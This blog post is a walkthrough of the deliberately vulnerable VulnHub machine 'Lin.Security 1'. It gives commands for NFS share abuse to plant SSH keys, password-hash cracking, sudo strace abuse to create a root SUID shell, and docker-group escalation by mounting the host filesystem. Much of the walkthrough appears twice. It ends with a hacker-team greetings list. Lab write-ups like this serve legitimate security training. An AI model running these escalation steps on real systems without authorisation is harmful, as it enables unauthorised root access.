Hello All,
This blog post is about the walk through of the vulnerable Linux VM "Lin.Security 1"
download Link :- https://www.vulnhub.com/entry/linsecurity-1,244/
After configuring the VM, I started with Port scanning using NMap scanner.
Result was following
Port 2049 is open and it is for NFS share service
To check the available shares on the machine, ran below mentioned command which shows the NFS share
showmount -e Machine_IP
ls -al command shows the content of the home directory of the user peter ("/home/peter")
after checking permission of the mounted share using below mentioned command
stat b0x
After searching on internet i came to know about NFS share vulnerability according to which "to access NFS share, uid and gid need to match the ones of the shared directory on the server"
Currently, NFS share permission is having UID 1001 and GID 1005.
so we need to have a OS user having name "ftp" with UID "1001" and GID "1005".
after changing the UID and GID of OS user FTP, switch to is and try to create a file so that we can confirm that we are having privilege to create file directory on the mounted share.
Now, i created .ssh directory and copied "id_rsa.pub" key of the user "ftp" to mounted share in directory ".ssh" with name "authorized_keys" so that i can SSH to machine from my machine using SSH key.
After pushing the SSH key file, we can login to machine by using below mentioned command:
ssh peter@machine_IP
Now, we are inside the machine. I read the "/etc/passwd" file and got a OS user "insecurity" entry having UID 0 and having unix hash in "Shadow masking" field
I searched about it and found that, in old systems, "/etc/passwd" file used to have password hash of the OS user. So I cracked the hash using Hashcat and got the plain text password of the hash
Now, i logged in as user "insecurity" using the recovered password and got root user privilege on the machine using one method.
As machine designer mentioned, there are multiple ways to root this machine, so i checked another possibilities as well and figured out that user "peter" is capable of running "strace" binary with sudo privilege. i used below mentioned command to check if user "peter" is having sudo privilege on executing any binary
sudo -l
Now, to take advantage of executing "strace" with sudo, I planned to compile a C program which drop user to "/bin/sh" shell, using sudo strace changing ownership to root user and making it SUID binary.
Code of C program which i used
compiled program using below mentioned command
gcc r.c -o r
After compiling the code, ran below mentioned command to change the ownership of the compiled C code file
sudo /usr/bin/strace chown root:root r
Check if command executed successfully or not
It worked and now binary is having owner "root".
To set SUID bit on file, ran below mentioned command using "strace" with sudo
sudo /usr/bin/strace chmod u+s r
Let's check whether binary is having SUID set on it by listing the permissions of file.
Great, now binary is having SUID bit as well set on it. now we just need to execute the binary and as we know that binary owner is "root" user and it is having SUDI bit set on it so we will get "/bin/sh" Shell with privilege of "root" user
Let's execute the binary and check whether we got "root" privilege or not by executing below mentioned command
./r
And yes, it worked and now we are in root "/bin/sh" shell :)
Using Docker
Machine is running docker in it and after searching little bit i came to know that if we have access to OS user account which is having membership of "docker" group, we can get root shell by using below mentioned commands
docker run --privileged --interactive --tty --volume /:/host bash
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
This blog post is about the walk through of the vulnerable Linux VM "Lin.Security 1"
download Link :- https://www.vulnhub.com/entry/linsecurity-1,244/
After configuring the VM, I started with Port scanning using NMap scanner.
Result was following
Port 2049 is open and it is for NFS share service
To check the available shares on the machine, ran below mentioned command which shows the NFS share
showmount -e Machine_IP
share "/home/peter" is available for any IP.
Let's mount it on attacker machine using below mentioned command
mount -t nfs Machine_ip:share_name local_machine_directory -nolock
I mounted NFS share on directory having name "b0x"
after checking permission of the mounted share using below mentioned command
stat b0x
After searching on internet i came to know about NFS share vulnerability according to which "to access NFS share, uid and gid need to match the ones of the shared directory on the server"
Currently, NFS share permission is having UID 1001 and GID 1005.
so we need to have a OS user having name "ftp" with UID "1001" and GID "1005".
after changing the UID and GID of OS user FTP, switch to is and try to create a file so that we can confirm that we are having privilege to create file directory on the mounted share.
Now, i created .ssh directory and copied "id_rsa.pub" key of the user "ftp" to mounted share in directory ".ssh" with name "authorized_keys" so that i can SSH to machine from my machine using SSH key.
After pushing the SSH key file, we can login to machine by using below mentioned command:
ssh peter@machine_IP
Now, we are inside the machine. I read the "/etc/passwd" file and got a OS user "insecurity" entry having UID 0 and having unix hash in "Shadow masking" field
I searched about it and found that, in old systems, "/etc/passwd" file used to have password hash of the OS user. So I cracked the hash using Hashcat and got the plain text password of the hash
Now, i logged in as user "insecurity" using the recovered password and got root user privilege on the machine using one method.
As machine designer mentioned, there are multiple ways to root this machine, so i checked another possibilities as well and figured out that user "peter" is capable of running "strace" binary with sudo privilege. i used below mentioned command to check if user "peter" is having sudo privilege on executing any binary
sudo -l
Now, to take advantage of executing "strace" with sudo, I planned to compile a C program which drop user to "/bin/sh" shell, using sudo strace changing ownership to root user and making it SUID binary.
Code of C program which i used
compiled program using below mentioned command
gcc r.c -o r
After compiling the code, ran below mentioned command to change the ownership of the compiled C code file
sudo /usr/bin/strace chown root:root r
Check if command executed successfully or not
It worked and now binary is having owner "root".
To set SUID bit on file, ran below mentioned command using "strace" with sudo
sudo /usr/bin/strace chmod u+s r
Let's check whether binary is having SUID set on it by listing the permissions of file.
Great, now binary is having SUID bit as well set on it. now we just need to execute the binary and as we know that binary owner is "root" user and it is having SUDI bit set on it so we will get "/bin/sh" Shell with privilege of "root" user
Let's execute the binary and check whether we got "root" privilege or not by executing below mentioned command
./r
And yes, it worked and now we are in root "/bin/sh" shell :)
Using Docker
Machine is running docker in it and after searching little bit i came to know that if we have access to OS user account which is having membership of "docker" group, we can get root shell by using below mentioned commands
docker run --privileged --interactive --tty --volume /:/host bash
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
Current user is member of "docker" group
Let's get root shell using above mentioned commands xD
Using first command
Using second command
As machine designer mentioned that there are multiple ways to get "root" privilege on the machine so try to get another ways as well.
Thanks for reading.
--==[[ With Love from Team IndiShell ]]==--
--==[[ Greetz To ]]==--#############################################################################################Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,#Hackuin,Alicks,mike waals,Dinelson Amine, cyber gladiator,Cyber Ace,Golden boy INDIA,#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash, D3############################################################################################# --==[[Love to]]==--# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, Anurag, Cyber Warrior#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
0 comments